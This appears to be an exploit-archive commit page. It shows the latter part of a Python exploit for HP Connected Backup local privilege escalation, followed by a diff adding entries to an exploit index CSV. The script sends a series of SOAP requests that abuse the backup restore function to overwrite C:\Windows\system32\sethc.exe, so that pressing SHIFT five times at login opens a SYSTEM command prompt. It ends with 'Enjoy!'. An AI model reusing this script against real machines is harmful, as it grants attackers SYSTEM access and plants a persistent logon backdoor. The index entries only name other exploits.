print """Sleeping for 300 seconds to give time for backup to complete.
If the script fails after this then change the sleep period to give the backup enough time to complete"""
time.sleep(300)
print "Initiating restore"
#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:PrepareForRetrieve xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:unsignedInt">456</param-1></q1:PrepareForRetrieve></soap:Body></soap:Envelope>""")
#We have to get the m-TDate value for the file in order for the restore to work correctly
print "Getting m-TDate value"
fileinfo = send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:GetRestoreDirectoryInfo xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXA==</param-1></q1:GetRestoreDirectoryInfo></soap:Body></soap:Envelope>""")
tdate = get_tdate(fileinfo)
print "Adding Restore file"
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:AddRestoreFile xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==</param-1><param-2 xsi:type="xsd:boolean">false</param-2><param-3 xsi:type="xsd:unsignedInt">"""+tdate+"""</param-3></q1:AddRestoreFile></soap:Body></soap:Envelope>""")
print "Setting alternate restore path to C:\\Windows\\system32\\"
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:SetAlternateRestorePath xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:string">C:\Windows\system32</param-1><param-2 xsi:type="xsd:boolean">false</param-2></q1:SetAlternateRestorePath></soap:Body></soap:Envelope>""")
#Set restore to replace existing file
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:SetReplaceExisting xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:boolean">true</param-1></q1:SetReplaceExisting></soap:Body></soap:Envelope>""")
print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe"
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:Restore xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")
print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"

15
files_exploits.csv
View file

@ -5258,6 +5258,8 @@ id,file,description,date,author,type,platform,port
43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware,
43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos,
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -9169,6 +9171,7 @@ id,file,description,date,author,type,platform,port
43799,exploits/windows/local/43799.txt,"Trillian Pro < 2.01 - Design Error",2004-03-01,"GulfTech Security",local,windows,
43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows,
43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows,
43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows,
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,
40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
@ -37245,6 +37248,18 @@ id,file,description,date,author,type,platform,port
43850,exploits/php/webapps/43850.txt,"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities",2018-01-21,Vulnerability-Lab,webapps,php,
43852,exploits/php/webapps/43852.php,"PHPFreeChat 1.7 - Denial of Service",2018-01-21,"A. Pakbaz",webapps,php,
43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution",2018-01-21,Bæln0rn,webapps,perl,
43855,exploits/php/webapps/43855.txt,"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection",2018-01-23,Vulnerability-Lab,webapps,php,
43858,exploits/multiple/webapps/43858.txt,"NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download",2018-01-23,LiquidWorm,webapps,multiple,
43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43861,exploits/php/webapps/43861.txt,"Affiligator 2.1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43862,exploits/php/webapps/43862.html,"RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)",2018-01-23,"Ihsan Sencan",webapps,php,
43863,exploits/php/webapps/43863.txt,"Easy Car Script 2014 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43865,exploits/php/webapps/43865.txt,"Zechat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43866,exploits/php/webapps/43866.txt,"Tumder 2.1 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43867,exploits/php/webapps/43867.html,"Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2018-01-23,"Ihsan Sencan",webapps,php,
43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,

Can't render this file because it is too large.